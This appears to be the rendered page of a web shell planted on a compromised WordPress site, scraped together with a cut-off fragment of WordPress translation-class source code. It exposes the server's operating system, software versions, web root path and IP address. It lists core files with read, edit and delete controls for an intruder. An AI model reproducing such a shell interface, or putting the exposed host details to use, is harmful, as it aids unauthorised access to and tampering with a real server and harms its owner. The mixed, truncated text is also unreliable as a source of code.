#0x2525
Linux debian-2gb-nbg1 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
  SOFT : Apache/2.4.62 (Debian) PHP : 8.2.28
/var/www/raiox.pt/html/wp-includes/pomo/
162.55.61.15

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
entry.php 3.772 KB -rw-r--r-- 2025-06-04 14:18 R E G D
mo.php 9.315 KB -rw-r--r-- 2025-06-04 14:18 R E G D
plural-forms.php 7.46 KB -rw-r--r-- 2025-06-04 14:18 R E G D
po.php 14.997 KB -rw-r--r-- 2025-06-04 14:18 R E G D
streams.php 7.748 KB -rw-r--r-- 2025-06-04 14:18 R E G D
translations.php 12.512 KB -rw-r--r-- 2025-06-04 14:18 R E G D
REQUEST EXIT
*/ public $headers = array(); /** * Adds an entry to the PO structure. * * @since 2.8.0 * * @param array|Translation_Entry $entry * @return bool True on success, false if the entry doesn't have a key. */ public function add_entry( $entry ) { if ( is_array( $entry ) ) { $entry = new Translation_Entry( $entry ); } $key = $entry->key(); if ( false === $key ) { return false; } $this->entries[ $key ] = &$entry; return true; } /** * Adds or merges an entry to the PO structure. * * @since 2.8.0 * * @param array|Translation_Entry $entry * @return bool True on success, false if the entry doesn't have a key. */ public function add_entry_or_merge( $entry ) { if ( is_array( $entry ) ) { $entry = new Translation_Entry( $entry ); } $key = $entry->key(); if ( false === $key ) { return false; } if ( isset( $this->entries[ $key ] ) ) { $this->entries[ $key ]->merge_with( $entry ); } else { $thi